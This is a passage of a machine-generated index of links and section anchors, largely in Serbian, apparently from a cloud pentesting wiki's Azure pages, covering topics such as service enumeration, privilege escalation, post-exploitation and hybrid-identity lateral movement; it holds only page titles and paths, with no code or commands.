azure-security/az-services/az-automation-accounts.html#podešavanja","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#runbooks--poslovi","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#rasporedi--webhook-ovi","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#kontrola-izvora","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#okruženja-za-izvršavanje","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#hibridne-radne-grupe","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#konfiguracija-stanja-sc","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#enumeracija","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#eskalacija-privilegija-i-post-eksploatacija","pentesting-cloud/azure-security/az-services/az-automation-accounts.html#reference","pentesting-cloud/azure-security/az-services/az-app-services.html#az---app-services","pentesting-cloud/azure-security/az-services/az-app-services.html#osnovne-informacije-o-app-service","pentesting-cloud/azure-security/az-services/az-app-services.html#osnovna-autentifikacija","pentesting-cloud/azure-security/az-services/az-app-services.html#kudu","pentesting-cloud/azure-security/az-services/az-app-services.html#izvori","pentesting-cloud/azure-security/az-services/az-app-services.html#webjobs","pentesting-cloud/azure-security/az-services/az-app-services.html#slotovi","pentesting-cloud/azure-security/az-services/az-app-services.html#azure-function-apps","pentesting-cloud/azure-security/az-services/az-app-services.html#enumeracija","pentesting-cloud/azure-security/az-services/az-app-services.html#primeri-za-generisanje-web-aplikacija","pentesting-cloud/azure-security/az-services/az-app-services.html#python-sa-lokalnog","pentesting-cloud/azure-security/az-services/az-app-services.html#python-sa-github-a","pentesting-cloud/azure-security/az-services/az-app-services.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-app-services.html#reference","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#az---cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#azure-cloud-shell","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#ključne-karakteristike","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#reference","pentesting-cloud/azure-security/az-services/az-cloud-shell.html#postojanost","pentesting-cloud/azure-security/az-services/az-container-registry.html#az---container-registry","pentesting-cloud/azure-security/az-services/az-container-registry.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-container-registry.html#dozvole","pentesting-cloud/azure-security/az-services/az-container-registry.html#autentifikacija","pentesting-cloud/azure-security/az-services/az-container-registry.html#enkripcija","pentesting-cloud/azure-security/az-services/az-container-registry.html#mrežno-povezivanje","pentesting-cloud/azure-security/az-services/az-container-registry.html#microsoft-defender-za-cloud","pentesting-cloud/azure-security/az-services/az-container-registry.html#soft-deletion","pentesting-cloud/azure-security/az-services/az-container-registry.html#webhook-ovi","pentesting-cloud/azure-security/az-services/az-container-registry.html#povezani-registri","pentesting-cloud/azure-security/az-services/az-container-registry.html#izvršenja-i-zadaci","pentesting-cloud/azure-security/az-services/az-container-registry.html#cache","pentesting-cloud/azure-security/az-services/az-container-registry.html#enumeration","pentesting-cloud/azure-security/az-services/az-container-registry.html#eskalacija-privilegija-i-post-eksploatacija","pentesting-cloud/azure-security/az-services/az-container-registry.html#reference","pentesting-cloud/azure-security/az-services/az-container-instances.html#az---container-instances","pentesting-cloud/azure-security/az-services/az-container-instances.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-container-instances.html#konfiguracije","pentesting-cloud/azure-security/az-services/az-container-instances.html#enumeracija","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#az---cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#azure-cosmosdb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#nosql-sql","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#mongodb","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#reference","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-cosmosDB.html#todo","pentesting-cloud/azure-security/az-services/intune.html#az---intune","pentesting-cloud/azure-security/az-services/intune.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/intune.html#cloud---on-prem","pentesting-cloud/azure-security/az-services/intune.html#references","pentesting-cloud/azure-security/az-services/az-file-shares.html#az---file-shares","pentesting-cloud/azure-security/az-services/az-file-shares.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-file-shares.html#tiers-pristupa","pentesting-cloud/azure-security/az-services/az-file-shares.html#bekap","pentesting-cloud/azure-security/az-services/az-file-shares.html#podržane-autentifikacije-putem-smb","pentesting-cloud/azure-security/az-services/az-file-shares.html#enumeracija","pentesting-cloud/azure-security/az-services/az-file-shares.html#povezivanje","pentesting-cloud/azure-security/az-services/az-file-shares.html#redovna-enumeracija-skladišta-pristupni-ključevi-sas","pentesting-cloud/azure-security/az-services/az-file-shares.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-file-shares.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-file-shares.html#postojanost","pentesting-cloud/azure-security/az-services/az-function-apps.html#az---function-apps","pentesting-cloud/azure-security/az-services/az-function-apps.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-function-apps.html#različiti-planovi","pentesting-cloud/azure-security/az-services/az-function-apps.html#storage-buckets","pentesting-cloud/azure-security/az-services/az-function-apps.html#mrežno-umrežavanje","pentesting-cloud/azure-security/az-services/az-function-apps.html#podešavanja-function-app-a--varijable-okruženja","pentesting-cloud/azure-security/az-services/az-function-apps.html#function-sandbox","pentesting-cloud/azure-security/az-services/az-function-apps.html#upravljane-identitete--metapodaci","pentesting-cloud/azure-security/az-services/az-function-apps.html#ključevi-pristupa","pentesting-cloud/azure-security/az-services/az-function-apps.html#osnovna-autentifikacija","pentesting-cloud/azure-security/az-services/az-function-apps.html#github-zasnovane-implementacije","pentesting-cloud/azure-security/az-services/az-function-apps.html#implementacije-zasnovane-na-kontejnerima","pentesting-cloud/azure-security/az-services/az-function-apps.html#enumeracija","pentesting-cloud/azure-security/az-services/az-function-apps.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-function-apps.html#reference","pentesting-cloud/azure-security/az-services/az-keyvault.html#az---key-vault","pentesting-cloud/azure-security/az-services/az-keyvault.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-keyvault.html#kontrola-pristupa","pentesting-cloud/azure-security/az-services/az-keyvault.html#ugrađene-uloge-key-vault-rbac","pentesting-cloud/azure-security/az-services/az-keyvault.html#mrežni-pristup","pentesting-cloud/azure-security/az-services/az-keyvault.html#zaštita-od-brisanja","pentesting-cloud/azure-security/az-services/az-keyvault.html#enumeracija","pentesting-cloud/azure-security/az-services/az-keyvault.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-keyvault.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-logic-apps.html#az---logic-apps","pentesting-cloud/azure-security/az-services/az-logic-apps.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-logic-apps.html#primeri","pentesting-cloud/azure-security/az-services/az-logic-apps.html#vizualizacija-logicapp-a","pentesting-cloud/azure-security/az-services/az-logic-apps.html#ssrf-zaštita","pentesting-cloud/azure-security/az-services/az-logic-apps.html#opcije-hostovanja","pentesting-cloud/azure-security/az-services/az-logic-apps.html#enumeracija","pentesting-cloud/azure-security/az-services/az-logic-apps.html#integracioni-nalozi","pentesting-cloud/azure-security/az-services/az-logic-apps.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-logic-apps.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#az---grupa-za-upravljanje-pretplate-i-resursne-grupe","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#grupe-za-upravljanje","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeracija","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#pretplate","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeracija-1","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#grupe-resursa","pentesting-cloud/azure-security/az-services/az-management-groups-subscriptions-and-resource-groups.html#enumeracija-2","pentesting-cloud/azure-security/az-services/az-mysql.html#az---mysql-baze-podataka","pentesting-cloud/azure-security/az-services/az-mysql.html#azure-mysql","pentesting-cloud/azure-security/az-services/az-mysql.html#ključne-karakteristike","pentesting-cloud/azure-security/az-services/az-mysql.html#enumeracija","pentesting-cloud/azure-security/az-services/az-mysql.html#povezivanje","pentesting-cloud/azure-security/az-services/az-mysql.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-mysql.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-mysql.html#todo","pentesting-cloud/azure-security/az-services/az-postgresql.html#az---postgresql-baze-podataka","pentesting-cloud/azure-security/az-services/az-postgresql.html#azure-postgresql","pentesting-cloud/azure-security/az-services/az-postgresql.html#ključne-karakteristike","pentesting-cloud/azure-security/az-services/az-postgresql.html#enumeracija","pentesting-cloud/azure-security/az-services/az-postgresql.html#povezivanje","pentesting-cloud/azure-security/az-services/az-postgresql.html#reference","pentesting-cloud/azure-security/az-services/az-postgresql.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-postgresql.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-postgresql.html#todo","pentesting-cloud/azure-security/az-services/az-queue-enum.html#az---queue-storage","pentesting-cloud/azure-security/az-services/az-queue-enum.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-queue-enum.html#enumeracija","pentesting-cloud/azure-security/az-services/az-queue-enum.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-queue-enum.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-queue-enum.html#postojanost","pentesting-cloud/azure-security/az-services/az-queue-enum.html#reference","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#az---service-bus-enum","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#service-bus","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#ključni-koncepti","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#napredne-funkcije","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#pravilo-autorizacije--sas-politika","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#imena-prostora","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#enumeracija","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-servicebus-enum.html#reference","pentesting-cloud/azure-security/az-services/az-sql.html#az---sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-database","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-managed-instance","pentesting-cloud/azure-security/az-services/az-sql.html#azure-sql-virtual-machines","pentesting-cloud/azure-security/az-services/az-sql.html#enumeracija","pentesting-cloud/azure-security/az-services/az-sql.html#povežite-se-i-izvršite-sql-upite","pentesting-cloud/azure-security/az-services/az-sql.html#reference","pentesting-cloud/azure-security/az-services/az-sql.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-sql.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#az---static-web-apps","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#osnovne-informacije-o-statičkim-web-aplikacijama","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#autentifikacija-prilikom-implementacije","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#osnovna-autentifikacija-web-aplikacije","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#rute-i-uloge","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#upravljane-identitete","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#enumeracija","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#primeri-za-generisanje-web-aplikacija","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#eskalacija-privilegija-i-post-eksploatacija","pentesting-cloud/azure-security/az-services/az-static-web-apps.html#reference","pentesting-cloud/azure-security/az-services/az-storage.html#az---storage-accounts--blobs","pentesting-cloud/azure-security/az-services/az-storage.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-storage.html#storage-krajnje-tačke","pentesting-cloud/azure-security/az-services/az-storage.html#javno-izlaganje","pentesting-cloud/azure-security/az-services/az-storage.html#povezivanje-sa-pohranom","pentesting-cloud/azure-security/az-services/az-storage.html#pristup-pohrani","pentesting-cloud/azure-security/az-services/az-storage.html#rbac","pentesting-cloud/azure-security/az-services/az-storage.html#pristupni-ključevi","pentesting-cloud/azure-security/az-services/az-storage.html#deljeni-ključevi-i-lite-deljeni-ključevi","pentesting-cloud/azure-security/az-services/az-storage.html#shared-access-signature--sas","pentesting-cloud/azure-security/az-services/az-storage.html#sftp-support-for-azure-blob-storage","pentesting-cloud/azure-security/az-services/az-storage.html#key-features","pentesting-cloud/azure-security/az-services/az-storage.html#setup-requirements","pentesting-cloud/azure-security/az-services/az-storage.html#permissions","pentesting-cloud/azure-security/az-services/az-storage.html#enumeration","pentesting-cloud/azure-security/az-services/az-storage.html#deljenje-fajlova","pentesting-cloud/azure-security/az-services/az-storage.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/az-storage.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/az-storage.html#postojanost","pentesting-cloud/azure-security/az-services/az-storage.html#reference","pentesting-cloud/azure-security/az-services/az-table-storage.html#az---table-storage","pentesting-cloud/azure-security/az-services/az-table-storage.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/az-table-storage.html#ključevi","pentesting-cloud/azure-security/az-services/az-table-storage.html#enumeracija","pentesting-cloud/azure-security/az-services/az-table-storage.html#privilege-escalation","pentesting-cloud/azure-security/az-services/az-table-storage.html#post-exploitation","pentesting-cloud/azure-security/az-services/az-table-storage.html#persistence","pentesting-cloud/azure-security/az-services/vms/index.html#az---virtuelne-mašine-i-mreža","pentesting-cloud/azure-security/az-services/vms/index.html#osnovne-informacije-o-azure-mrežama","pentesting-cloud/azure-security/az-services/vms/index.html#osnovne-informacije-o-vm-ovima","pentesting-cloud/azure-security/az-services/vms/index.html#konfiguracije-bezbednosti","pentesting-cloud/azure-security/az-services/vms/index.html#diskovi-i-snimci","pentesting-cloud/azure-security/az-services/vms/index.html#slike-galerijske-slike-i-tačke-vraćanja","pentesting-cloud/azure-security/az-services/vms/index.html#azure-site-recovery","pentesting-cloud/azure-security/az-services/vms/index.html#azure-bastion","pentesting-cloud/azure-security/az-services/vms/index.html#metadata","pentesting-cloud/azure-security/az-services/vms/index.html#vm-enumeration","pentesting-cloud/azure-security/az-services/vms/index.html#izvršavanje-koda-u-vm-ovima","pentesting-cloud/azure-security/az-services/vms/index.html#vm-ekstenzije","pentesting-cloud/azure-security/az-services/vms/index.html#relevant-vm-extensions","pentesting-cloud/azure-security/az-services/vms/index.html#vm-applications","pentesting-cloud/azure-security/az-services/vms/index.html#korisnički-podaci","pentesting-cloud/azure-security/az-services/vms/index.html#prilagođeni-podaci","pentesting-cloud/azure-security/az-services/vms/index.html#pokreni-komandu","pentesting-cloud/azure-security/az-services/vms/index.html#eskalacija-privilegija","pentesting-cloud/azure-security/az-services/vms/index.html#neautentifikovani-pristup","pentesting-cloud/azure-security/az-services/vms/index.html#post-eksploatacija","pentesting-cloud/azure-security/az-services/vms/index.html#postojanost","pentesting-cloud/azure-security/az-services/vms/index.html#reference","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#az---azure-network","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#osnovne-informacije","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#virtuelna-mreža-vnet-i-podmreže","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeracija","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#grupa-za-bezbednost-mreže-nsg","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeracija-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-firewall","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-tabele-rute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeracija-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-private-link","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-1","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-service-endpoints","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-2","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#razlike-između-servisnih-krajnih-tačaka-i-privatnih-linkova","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-front-door-afd--afd-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeracija-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-application-gateway-i-azure-application-gateway-waf","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeracija-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-hub-spoke--vnet-peering","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-3","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#site-to-site-vpn","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-4","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#azure-expressroute","pentesting-cloud/azure-security/az-services/vms/az-azure-network.html#enumeration-5","pentesting-cloud/azure-security/az-permissions-for-a-pentest.html#az---permissions-for-a-pentest","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#az---lateral-movement-cloud---on-prem-1","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#on-prem-mašine-povezane-sa-cloud-om","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#tokeni-i-ograničenja","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#tehnike-pivotiranja","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/index.html#reference","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#az-ad-connect---hybrid-identity","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/index.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#az--sinhronizacija-novih-korisnika","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#sinhronizacija-azuread-korisnika-sa-on-prem-da-bi-se-eskaliralo-sa-on-prem-na-azuread","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-synchronising-new-users.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-default-applications.html#az---default-applications","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#az---cloud-kerberos-trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#trust","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#kerberos-tgt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#ntlm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#zloupotreba-cloud-kerberos-trust-za-dobijanje-domain-admin","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#preduslovi-za-napad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/az-cloud-kerberos-trust.html#potpuni-napad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#az---federacija","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#pivotiranje","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#golden-saml","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/federation.html#reference","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#az---phs---sinhronizacija-heša-lozinke","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#pivotiranje","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#pronalaženje--azure-ad-connect-servera","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#zloupotreba-msol_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#zloupotreba-sync_","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/phs-password-hash-sync.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#az---pta---prolazna-autentifikacija","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#tok-autentifikacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#lokalno---oblak","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#cloud---on-prem","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/pta-pass-through-authentication.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#az---seamless-sso","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#on-prem---cloud","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#on-prem---cloud-putem-ograničene-delegacije-na-bazi-resursa","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/azure-ad-connect-hybrid-identity/seamless-sso.html#reference","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#az---arc-ranjivi-gpo-deploy-script","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#identifikacija-problema","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#exploit","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-arc-vulnerable-gpo-deploy-script.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#az---lokalne-cloud-akreditivi","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#lokalna-pohrana-tokena-i-bezbednosne-preporuke","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-cli-interfejs-za-komandnu-liniju","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#azure-powershell","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#automatski-alati-za-pronalaženje","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.html#bezbednosne-preporuke","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#az---pass-the-cookie","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#zašto-kolačići","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#napad","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.html#references","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#az---pass-the-certificate","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#pass-the-certificate-azure","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.html#reference","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#az---pass-the-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#Šta-je-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#proverite-da-li-imate-prt","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#prt-kolačić","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#prt-cookie-tok-koristeći-tpm","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#prt-zloupotreba-scenariji","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#pass-the-prt-napad-primeri","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#napad---roadtoken","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#napad---korišćenje-roadrecon","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#napad---korišćenje-aadinternals-i-propuštenog-prt-a","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#napad---mimikatz","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/pass-the-prt.html#reference","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-phishing-primary-refresh-token-microsoft-entra.html#az---phishing-primary-refresh-token-microsoft-entra","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#az---processes-memory-access-token","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.html#osnovne-informacije","pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.html#az---primarni-osvežavajući-token-prt","pentesting-cloud/azure-security/az-post-exploitation/index.html#az---post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#az---blob-storage-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#storage-privesc","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobsread","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#microsoftstoragestorageaccountsblobservicescontainersblobswrite","pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.html#delete","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#az---cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#cosmosdb-post-exploitation","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsread--microsoftdocumentdbdatabaseaccountswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersread--microsoftdocumentdbdatabaseaccountssqldatabasescontainerswrite","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabaseswrite--microsoftdocumentdbdatabaseaccountssqldatabasesread","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsfailoverprioritychangeaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountsregeneratekeyaction","pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.html#microsoftdocumentdbdatabaseaccountssqldatabasescontainersuserdefinedfunctionswrite--microsoftdocumentdbdatabaseacco